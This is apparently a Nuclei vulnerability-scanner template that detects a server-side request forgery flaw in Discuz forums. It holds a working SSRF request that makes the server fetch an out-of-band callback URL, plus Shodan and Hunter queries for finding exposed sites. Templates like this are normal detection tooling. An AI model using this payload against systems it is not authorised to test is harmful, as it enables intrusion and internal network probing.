id: discuz-downremoteimg-ssrf

info:
  name: Discuz DownRemoteImg - Server-Side Request Forgery
  author: pwnhxl
  severity: high
  description: Discuz DownRemoteImg - Server-Side Request Forgery
  reference:
    - https://www.seebug.org/vuldb/ssvid-91879
    - https://cloud.tencent.com/developer/article/1511949
    - https://github.com/opensec-cn/kunpeng/blob/master/plugin/go/discuzSSRF.go
  metadata:
    verified: "true"
    shodan-query: title:"Powered by Discuz"
    hunter-query: web.body="Discuz! X3.1"
  tags: discuz,ssrf,oast

requests:
  - method: GET
    path:
      - "{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/test?.jpg[/img]"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "ATTACHORIMAGE"

      - type: status
        status:
          - 200